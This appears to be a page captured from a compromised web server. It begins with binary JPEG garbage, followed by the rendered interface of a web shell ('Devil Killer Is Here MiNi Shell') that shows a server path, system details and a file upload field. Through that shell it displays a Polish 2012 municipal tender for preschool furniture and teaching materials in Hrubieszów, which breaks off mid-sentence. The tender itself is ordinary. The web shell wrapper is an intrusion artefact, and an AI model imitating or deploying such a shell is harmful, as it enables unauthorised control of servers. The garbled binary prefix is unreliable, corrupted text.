JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120906/191675-N-2012.html

<p class="kh_header"><b>Hrubieszów: dostawa wyposażenia 5 punktów przedszkolnych i materiałów dydaktycznych w ramach realizowanego projektu Kubusiowa Akademia z Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 191675 - 2012; data zamieszczenia: 06.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Hrubieszów , ul. B. Prusa 8, 22-500 Hrubieszów, woj. lubelskie, tel. 0 84 696 26 81, faks 0 84 696 27 94.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> htp://www.bip.hrubieszow-gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa wyposażenia 5 punktów przedszkolnych i materiałów dydaktycznych w ramach realizowanego projektu Kubusiowa Akademia z Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyposażenia 5 punktów przedszkolnych,utworzonych w budynkach szkół tj. Szpikołosy, Czerniczyn, Husynne, Cichobórz, Ślipcze  i materiałów dydaktycznych w ramach realizacji projektu Kubusiowa Akademia - utrwalanie i rozwój efektów Poakcesyjnego Programu Wsparcia Obszarów Wiejskich w Gminie Hrubieszów w ramach Priorytetu IX, Działanie 9.1., Poddziałanie 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki.
Zakres zamówienia obejmuje:

I. Wyposażenie 5 punktów przedszkolnych (dostawa i montaż):

1) krzesełko przedszkolne - 2 szt., drewniane siedzisko i oparcie, metalowe nóżki - z
możliwością regulacji wysokości;
2) stoliki przedszkolne - 4 szt z możliwością regulacji wysokości, blat: 60cm x 60cm, blat o grubości 2 cm chroniony kolorowym, trwałym obrzeżem PCV, nogi kwadratowe, drewniane;
3) zestaw mebli wykonany z płyty laminowanej w tonacji różnokolorowej, składający się z min. 24 szafek z drzwiczkami do przechowywania pomocy. Zestaw powinien być rozstawny, drzwi wykonane z płyty MDF z kolorowymi frontami, długość całego zestawu około 3m - 4 zestawy;
4) szafka na ubranie do szatni - 1 szt, stabilna z metalowym stelażem i aplikacją w 5
kolorach przeznaczone dla 6 dzieci z półeczkami na czapki z przegródkami, zawieszkami
na ubranie, oraz ławeczkami wykonanymi z płyty laminowanej w tonacji jasnego buku, z
półeczkami na buty, wym. 135 x 42 x 130 cm;
5) łóżeczko przedszkolne - leżak, wym. 132 x 60 x 15,5 cm - leżaki - 2 sztuki;

II. Materiały dydaktyczne do 5 punktów przedszkolnych dostawa do siedziby Zamawiającego:
6)	Zestaw materiałów dydaktycznych dla przedszkolaków - 2 zestawy dostarczane w terminach: do 31.10.2012 - 1 zestaw, do 31.08.2013 - 1 zestaw
1 zestaw zawiera:
	wyprawkę materiałów plastycznych dla minimum 20-osobowej grupy dzieci na cały rok. Zapakowanych w 5 odrębnych wyprawek. - 5 wyprawek. 
1 wyprawka zawierać powinna : papier rysunkowy biały A4 - 700 ark., papier rysunkowy kolorowy A3 - 200 ark., papier rysunkowy kolorowy A4 - 300 ark., brystol biały A3 - 100 ark., brystol biały A4 - 250 ark., brystol kolorowy A4 - 100 ark., karton kolorowy A3 minimum 15 kolorów - 60 ark., papier wycinankowy A4 minimum 10 kolorów - 130 szt., Papier pakowy - 25 ark., Bibuła gładka 50 x 70 cm minimum 10 kolorów- 30 ark., Krepina karbowana minimum 12 kolorów - 5 szt, krepina dekoracyjna - 3 rolki , Krepina metalizowana 28 x 34 cm - 10 ark., Flizelina artystyczna 23 x 33 cm - 10 ark., Papier zielony 64 x 94 cm - 500 ark., Papier żółty 64 x 94 cm - 500 ark., Tektura falista beżowa A4 - 100 ark., Tektura falista złota - 10 ark 25 x 35 cm i srebrna 25 x 35 cm - 10 ark., Akwarele 12 kolorów - 12 opakowań, Tempery 6 kolorów - 6 litrów, Koncentrat perłowy do farb - 500 ml, Klej uniwersalny - 1 litr, Kredki ołówkowe (minimum 12 kolorów) - 25 opakowań, Kredki świecowe - grube minimum 12 kolorów - 25 opakowań, Ołówki - 30 szt., plastelina minimum 12 kolorów - 15 szt ;
	dziurkacze wycinające różnorodne kształty koniczynka - 5 szt, kwiatuszek - 5szt, serduszko - 5szt, miś - 5szt, śnieżynka - 5 szt, dziurkacz z efektem trójwymiarowym - 5 szt,;
	zestaw szablonów do odrysowywania kształtów minimum 6 wzorów w zestawie o wym. 15x15cm  - 12 szt;
	plastikowe foremki do wykrawania kształtów z plasteliny. Minimum 6 szt. w zestawie wym. 8 6 x 6 7 cm - 5 zestawów;
	komplet szablonów masek wykonanych z trwałego tworzywa, z możliwością zmycia farb - format zbliżony do A4 - 6 szt w komplecie - 5 kompletów
	stemple do odbijania na papierze zwierzątka - 40 sztuk, owoce- 40 szt, warzywa - 40 szt. Każdy stempel powinien posiadać uchwyt, wygodny do trzymania. średnica stempla ok. 7,5 cm ;
	pastele minimum 25 kolorów - 50 opakowań;
	klej 1 litrowy - 15 szt;
	farby plakatowe minimum 6 sztuk w 1 opakowaniu, minimum 20ml) - 60 opakowań;
	koraliki do nawlekania i liczenia minimum 250 g w opakowaniu - 20 opakowań;
	cekiny duże o różnych kształtach minimum 50 g w opakowaniu - 20 opakowań;
	zestaw brystoli kolorowych A4 1 zestaw: min. 25 kolorów po 10 arkuszy każdego koloru, czyli 250 arkuszy w 1 zestawie) - 15 zestawów ;
	zestaw brystoli kolorowych A3 1 zestaw: minimum 5 kolorów po 20 arkuszy każdego koloru, czyli 100 arkuszy w 1 zestawie- 15 zestawów;
	zestaw drucików kreatywnych wykonanych z łatwo wyginającego się drutu obciągniętych miękkim tworzywem. 1 zestaw zawiera: druciki cienkie kolorowe - minimum 100 szt. śr. 6 mm dł. 30 cm, druciki brokatowe - minimum 100 szt. śr. 6 mm dł. 30 cm, druciki grube kolorowe - minimum 100 szt.,  wym. 15 x 500 mm) - 10 zestawów;
	prasy do papieru pozwalające wytłoczyć różne wzory - wym. prasy  minimum 17 x 13, 5 cm, szer. papieru 11 cm - 10 szt ;
	zestaw butelek z kolorowym brokatem o różnych kształtach minimum 10 butelek w zestawie - 15 sztuk;
	zestaw sizalu do prac plastycznych minimum 50g szt, 1 zestaw zawiera 5 kolorów sizalu) - 20 zestawów;
	zestaw nożyczek przedszkolnych o różnych wzorkach 1 zestaw zawiera minimum 4 pary nożyczek o różnych wzorkach - 10 zestawów;
	nożyczki przedszkolne zwykłe, bezpieczne z zaokrąglonymi końcami, dł. ok. 12,5cm  -30 szt;
	szablony wykonane z tworzywa sztucznego pozwalające na odrysowanie zarysu warzyw  lub owoców, wym. min.15 x 22 cm 1 opakowanie zawiera 6 sztuk warzyw i 6 sztuk owoców) - 2 opakowania;
	pędzle zakończone gąbką do malowania - 20 szt;
	farba do malowania po kredkach woskowych lub pastelach - 2 tuby poj. min. 120 ml;
	papier do origami - 500 szt;
	pomponiki z tworzywa gąbczastego do manualnego tworzenia figurek - minimum 90 szt. w zestawie, różne kolory, wym. od 15 do 30 mm  - 1 zestaw;
	piórka do prac plastycznych, kolorowe, 1 opakowanie zawiera min. 80 g około 700 szt - 1 opakowanie;
	opakowanie filcowych kolorowych elementów do wyklejania - min 150 sztuk w opakowaniu - 1 opakowanie;
	patyczki drewniane do zabaw i prac plastycznych, 1 zestaw zawiera min. 50 szt., wymiary min. 114 x 10 x 2 mm - 2 zestawy;
	tamburyn wym. min. śr. 20 cm - 5 szt;
	gumowe zabawki wydające dźwięki zwierząt - 4 sztuki;
	tablica do ćwiczeń manualnych z wierszykami, drewniana, z pisakiem, wym. 30 x 21 cm - 1 sztuka;
	tabliczka do ćwiczeń manipulacyjnych, wspomagająca rozwój motoryki rąk oraz koordynację wzrokowo - ruchową, wym. min. 41,5 x 22 cm - 1 sztuka;
	układanka do nauki liczenia w zakresie do 10, wym. 37,8 x 20,6 cm - 1 sztuka;


7) Materiały edukacyjne do prowadzenia zajęć ogólnorozwojowych gry rozwijające twórcze i logiczne myślenie, ćwiczące koncentrację i koordynację wzrokowo-ruchową, ćwiczenie zręczności, refleksu, rozpoznawania kolorów, kształtowanie słuchu fonematycznego, umiejętności sortowania - 2 zestawy dostarczane w terminach: do 31.10.2012 - 1 zestaw, do 31.08.2013 - 1 zestaw
 1 zestaw zawiera: 
	książeczki edukacyjne rozwijające umiejętność koncentracji dźwięku, spostrzegania, pamięć słuchową z płytami CD - 5 sztuk;
	gra planszowa przygotowująca do nauki alfabetu - 5 szt;
	książeczki z bajkami do czytania 2 rodzaje po 5 sztuk - 10 sztuk; 
	książeczki z wierszykami okolicznościowymi - 5 sztuk;
	zestaw kart edukacyjnych przedstawiających zjawiska przyrodnicze, zwierzęta, rośliny itp. - 5 zestawów;
	zestaw kart/plansz do poznawania miast Polski - 5 zestawów; 
	zestaw kart z historyjkami obrazkowymi rozwijającymi wyobraźnię -  5 zestawów; 
	zestaw do malowania rozwijający sprawność manualną i uczący koncentracji z kredkami, arkuszami papieru, szablonami - 5 zestawów; 
	geograficzna mapa Polski przedstawiająca województwa -5 sztuk; 
	tablica edukacyjna z obrazkami podzielonymi, umożliwiająca układanie elementów w całość - 5 szt ;
	zestaw stempli piankowych z uchwytem umożliwiających odbijanie wzorów np. geometrycznych z tuszu lub farb - 5 zestawów; 
	zestaw kolorowych krążków magnetycznych służące do zaznaczania na tablicy magnetycznej minimum 25 sztuk w 1 zestawie, średnica minimum 2,5 cm; 
	lupa o średnicy min. 30 mm i powiększeniu 3x,dwustronna - 10 szt;
	 liczydło drewniane, minim. wym. 29,5 x 9,5 x 31,5 cm  - 5 szt; 
	gra, rozwijająca u dzieci umiejętność rozpoznawania i wyrażania emocji m.in. radości, smutku, strachu, złości itp. - 5 szt ;
	zestaw szali w 3 różnych kolorach do ćwiczeń sprawnościowych i zabaw, wymiary min. 140 x 100 cm minimum 6 szali w zestawie - 5 zestawów;  
	zestaw puzzli do układania 1 zestaw zawiera 10 szt różnych puzzli obrazkowych, minimalny rozmiar 39 x 29cm - 5 zestawów ;
	zestaw gier zręcznościowych 1 zestaw zawiera 5 różnych gier - 5 zestawów; 
	układanka przedstawiająca mapę Polski, wymiary min. wym. planszy: 40 x 40 x 0,8cm. - 5 sztuk; 
	gra edukacyjna pozwalająca poznać cztery pory roku - 5 sztuk; 
	zestaw bajek na płytach CD wraz z książeczkami do czytania 1 zestaw zawiera minimum 10 bajek - 5 zestawów ;
	gra planszowa, dzięki której dzieci poznają zagadnienia związane ze środowiskiem - 5 szt; 
	gra scrable obrazkowe - 5 szt ;
	zestaw gra sprawnościowa z piłką na ćwiczenie równowagi, skupienia i sprawności - 5 szt ;
	gra ucząca porównywania graficznych kształtów z rzeczywistymi przedmiotami - 1 sztuka;
	kostka do gier i zabaw duża, dł. boku min 10 cm - 2 sztuki;
	układanka drewniana ucząca cyferek do 10 - 1 sztuka;
	woreczki wypełnione grochem, 1 zestaw min 4 sztuki -25 opakowań; 
	dmuchany konik z siodłem o wym. min 72 cm w obwodzie - 2 szt;
	zestaw piłeczek do treningu dłoni. Ćwiczenia wzmacniają mięśnie oraz usprawniają motorykę dłoni.1 zestaw zawiera min 4 szt. o śr. 10 cm - 4 zestawy;
	kolorowe aplikacje ścienne, wym. 60 x 101 cm - 1 zestaw
	piłka o średnicy min. 30 cm - 1 szt

8) Wyposażenie kącika zainteresowań chłopcy dziewczynki, kąciki kuchenne, zabawa w dom, zabawa w sklep, lego, rakieta, piracki statek, kolejka - 2 zestawy (dostarczane w terminach: do 31.10.2012 - 1 zestaw, do 31.08.2013 - 1 zestaw;
1 zestaw zawiera:
	hula-hop - 5 sztuk; 
	zestaw szpulek do ćwiczeń manipulacyjnych, sortowania i przeliczania 1 zestaw zawiera min 40 szt. o śr. 2 cm, wys. 3 cm, 5 sznureczków, w kilku kolorach - 5 zestawów; 
	skakanka - 10 szt ;
	wózek dla lalek ze sztywnym siedziskiem wyposażony w koszyczek, wym. min. 50 x 27 x 25 cm - 5 sztuk ;
	zestaw obiadowych plastikowych naczynek dla min.12 osób 1 zestaw zawiera min. 12 talerzy głębokich, 12 talerzy płytkich  12 kubeczków, 12 kpl. sztućców - 5 zestawów; 
	zestaw wyposażenia kącika fryzjerskiego dla lalek - 5 zestawów ;
	koparka, wymiary min. 26 x 15 x 12 cm - 5 sztuk; 
	zestaw do tworzenia własnych pacynek na palce 1 zestaw zawiera min 5 figurek różnego kształtu - 5 zestawów; 
	lalka imitująca niemowlę - 5 sztuk; 
	zestaw plastikowych warzyw 1 zestaw zawiera 48 elementów, co najmniej po 6 różnych imitacji warzyw 5 zestawów; 
	śmieciarka - pojazd , wym. min. 23,5 x 13 x 12 cm - 5 szt;
	zestaw dużych klocków, wymiary min. dł. 15- 23 cm - 5 zestawów; 
	zestaw klocków dużych i lekkich do zabaw konstrukcyjnych i tematycznych z dodatkowymi elementami np. zwierzętami - 5 zestawów;
	warsztat stolarza z akcesoriami do zabawy - 1 sztuka;
	lalka z zestawem akcesoriami do kąpieli - 1 sztuka;
	lalka z nocnikiem, butelką i kubkiem - 1 sztuka; 
	kuchenny kącik z akcesoriami - 1 zestaw;
	zestaw produktów do zabawy jak również do nauki liczenia imitujący spożywcze produkty, 1 zestaw min 8 produktów - 1 zestaw; 
	koparko - ładowarka duża - 1 sztuka;


9) Pomoce dydaktyczne do indywidualnej terapii logopedycznej dla dzieci w wieku 3-5 lat - 2 zestawy dostarczane w terminach: do 31.10.2012 - 1 zestaw, do 31.08.2013 - 1 zestaw),
1 zestaw zawiera: 
	pakiet programów multimedialnych trzy części kształtujący prawidłową wymowę wśród dzieci, zawierający min. 500 obrazków z 4 poziomami trudności. Zestaw przeznaczony do korygowania wadliwej artykulacji głosek szeregu szumiącego oraz innych: j, l, r, b, p, k, g, t, d, f, w;  - 5 sztuk;
	książeczka do kolorowania, dokonywania opisu postaci i poprawnego stosowania utrwalonej głoski, kształtująca umiejętność tworzenia dłuższych wypowiedzi - 5 sztuk;
	poradnik dla logopedów, ukazujący sposoby wywoływania prawidłowego brzmienia głosek - 5 sztuk;
	zbiór ćwiczeń oddechowych, usprawniające aparat artykulacyjny oraz ćwiczenia w naśladowaniu dźwięków otoczenia - 5 sztuk;
	książka zawierająca teksty prostych wierszyków z zapisem nutowym, płytami CD z nagranymi tekstami - 5 sztuk;
	drewniana zabawka logopedyczna usprawniająca aparat oddechowy, artykulacyjny, fonacyjny - 5 sztuk;
	mikrofon z możliwością nagrywania i odtwarzania dźwięków (do 4 godzin) w dwóch formatach MP3 lub WAY, posiadający wyświetlacz LCD - 5 sztuk;
	pomoc logopedyczna do utrwalenia poprawnej artykulacji głoski ,,r, zawierająca zestawy odpowiednio dobranych obrazków 1 zestaw min .70 sztuk; - 5 sztuk;
	książka do stymulowania rozwoju mowy dziecka. Powinna zawierać zadania polegające na czytaniu przez logopedę wierszyka, zadaniem dziecka jest jego narysowanie; - 5 sztuk;
	zestaw zbioru opowiadań dla dzieci, zawierający min 2 płyty CD audio, dla dzieci w wieku 3-7 lat; - 5 zestawów; 
	zestaw materiałów obrazkowych stymulujących rozwój spostrzegania wzrokowego, myślenia przyczynowo-skutkowego, mowy, wyobraźni, składający się z teczki z historyjkami 6-elementowymi; - 5 zestawów;
	puzzle logopedyczne przeznaczone dla dzieci przedszkolnych, służące do utrwalania prawidłowej wymowy głosek: j, ł, ch, n, m; - 5 sztuk;
	gry logopedyczne, służące rozwojowi mowy dziecka w wieku przedszkolnym, wczesnoszkolnym w zakresie poprawnej wymowy głosek: sz, rz, cz, dż, s, z, c, dz, ś, ź ,ć, dź; - 5 gier;
	grę rozwijającą pamięć i wrażliwość słuchową oraz koordynację słuchowo-wzrokowo-ruchową; - 5 gier;
	zestaw zagadek 1 zestaw min. 20 składających się ze ścieżki dźwiękowej oraz kart ze zdjęciami. Dźwięki powinny dotyczyć rzeczy znanych i bliskich dziecku takich jak zjawiska pogodowe czy zwierzęta; - 5 zestawów;
	książka z płytą CD, zawierająca historyjki obrazkowe z dołączonymi do niej piosenkami - 5 sztuk;
	zestaw zabaw min. 200 zabaw, kształtujących percepcję słuchową - 5 zestawów; 
	zestaw zabaw i rysunków do badania słuchu fonemowego i fonematycznego; - 5 zestawów;
	zestaw gier logopedycznych min 4, łączących w sobie dźwięki i labiogramy; - 5 zestawów;
	zestaw kart z ilustracjami min. 300 rysunków, zawierające: labirynty, układanki, grę planszową, wycinanki - 5 zestawów;
	zestaw do pracy z dzieckiem z trudnościami w różnicowaniu głosek sz-s; - 5 zestawów;
	zestaw gwiazdek drewnianych do ćwiczeń oddechowych - 5 zestawów;
	zestaw ćwiczeń grafomotorycznych rozwijających koordynację wzrokowo-ruchową - 5 zestawów;
	memo - obrazki, do utrwalania głoski ,,r - 5 sztuk;
	domino logopedyczne do różnicowania głoski ż  rz - 5 sztuk;
	zestaw do robienia baniek mydlanych - 5 zestawów;
	zbiór tekstów logopedycznych o każdej głosce - 5 zestawów;
 zestaw ilustrowanych wierszyków i bajeczek do zabaw, rozmów i ćwiczeń rozwijających mowę dziecka - 5 zestawów;
	zestaw zabaw kształtujących prawidłowy tor oddechowy - 5 zestawów;
	zeszyt ćwiczeń utrwalający prawidłową wymowę głosek s,z,c,dz - 5 sztuk;
	brystol kolorowy A3 - 20 sztuk;
	 test do badania wymowy dziecka w wieku przedszkolnym - 5 sztuk;
10) Pomoce dydaktyczne do j. angielskiego - 2 zestawy dostarczane w terminach: do 31.10.2012 - 1 zestaw, do 31.08.2013 - 1 zestaw
1 zestaw zawiera: 
	Zestaw plansz tematycznych wspomagające zapamiętywanie cyfr z języka angielskiego - 5 zestawów; 
	Zestaw plansz tematycznych wspomagające zapamiętywanie kolorów z języka angielskiego - 5 zestawów; 
	Zestaw plansz tematycznych wspomagające zapamiętywanie kształty z języka angielskiego - 5 zestawów; 
	Karty do gry ułatwiające naukę angielskich słówek - 5 zestawów;
	Gra ułatwiająca liczenie w j. angielskim - 5 gier;
	Zestaw ilustracji do nauki czasowników i rzeczowników angielskich. 1  zestaw zawiera: min. 100 szt. fotografii, 100 szt. podpisów - 5 zestawów;
	Gra dźwiękowa ucząca słów wyrażających emocje w j. angielskim z płytami CD - 5 sztuk;
	Zeszyt fiszek z rzeczownikami angielskimi - 5 sztuk;
	Pomoc dydaktyczna do nauki nazw zwierząt w j. angielskim - 5 sztuk;
	Pomoc dydaktyczna do nauki nazw zawodów w j. angielskim - 5 sztuk;
	Pomoc dydaktyczna do nauki nazw emocji w j. angielskim - 5 sztuk;
	Zestaw bajek w j. angielskim 1 zestaw zawiera 5 bajek - 5 zestawów;
	Zestaw wierszyków w języku angielskim - 5 zestawów;
	Zestaw książek z zagadkami w j. angielskim 1 zestaw zawiera 7 różnych książecze - 5 zestawów;
	Zestaw płyt CD z piosenkami dla dzieci w j. angielskim 1 zestaw zawiera min.7 płyt- 5 zestawów;
	Zestaw kart z obrazkami do nauki pierwszych słów min. 100 kart - 5 zestawów;
	Kalendarz z porami roku w j. angielskim - 5 sztuk;
	Mata edukacyjna z dniami tygodnia w j. angielskim - 5 sztuk;
	Mata edukacyjna pozwalająca na naukę cyfr oraz kolorów w języku angielskim do rozłożenia na podłodze, wym. 60 x 250 cm - 5 sztuk;
	Gra edukacyjna ucząca robienia zakupów z nazwami produktów spożywczych i części garderoby - 5 sztuk;
	Piłka służąca do nauki nazw części ciała - 5 sztuk;
	Piłka służąca do nauki nazw ubrań- 5 sztuk;
	Piłka służąca do nauki nazw zwierząt - 5 sztuk;
	Książka do nauki słówek z obrazkami - 5 sztuk;
	Zestaw puzzli 1 zestaw zawiera 5 opakowań różnych puzzli - 5 zestawów; 
11) minitornister z wyposażeniem dla przedszkolaka - 26 zestawów (z dostawą w terminach: do 31.10.2012 r. - 13 zestawów, 31.08.2013 r. - 13 zestawów;)
1 zestaw zawiera: bloki rysunkowe formatu A4 - 5 szt, klej w tubie - 2 szt, kredki woskowe - 1 kpl co najmniej 12 kolorów, ołówkowe - 1 kpl co najmniej 12 kolorów, plastelina - 2 opakowania co najmniej 6 kolorów,  krepina w trzech kolorach - 3 sztuki, tektura falista - 10 arkuszy formatu A4, teczka rysunkowa na rysunki formatu A4 - 1 szt, chusteczki higieniczne - 5 paczek, zeszyty 16-kartkowe - 6 szt 3 szt w kratkę, 3 w dwu linie, brystol formatu A3 - 2 szt, ołówki z gumką, twardość HB - 2 szt) - 26 zestawów z dostawą w terminach: do
31.10.2012 r. - 13 zestawów, 31.08.2013 r. - 13 zestawów;

Wyposażenie będące przedmiotem zamówienia musi posiadać atesty lub certyfikaty, meble
powinny być dostosowane do wymagań ergonomii, zabawki muszą spełniać wymagania
bezpieczeństwa i higieny oraz posiadają oznakowanie CE - zgodnie z rozporządzeniem
Ministra Edukacji Narodowej w sprawie rodzajów innych form wychowania przedszkolnego,
warunków tworzenia i organizowania tych form oraz sposobu ich działania.
Wszystkie elementy zamówienia powinny być oznakowane podstawowymi logotypami: Logo
PO KL i flagę Unii Europejskiej z dwoma podpisami oraz informacją o realizowaniu projektu
współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu
Społecznego - według Wytycznych dotyczących oznaczania projektów w ramach Programu
Operacyjnego Kapitał Ludzki z dnia 4 lutego 2009 r.
Zgodnie z art. 36 ust. 4 ustawy wykonawca zobowiązany jest do wskazania w ofercie części
zamówienia, której wykonanie powierzy podwykonawcom.
Realizowany projekt współfinansowany jest ze środków Unii Europejskiej z Europejskiego
Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
Określenie przedmiotu zamówienia wg Wspólnego Słownika Zamówień CPV:
39150000-8 Różne meble i wyposażenie
39160000-1 Meble szkolne
39162100-6 Pomoce dydaktyczne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.16.00.00-1, 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności i czynności;
Zamawiający uzna za spełniony ww. warunek udziału w postępowaniu jeżeli
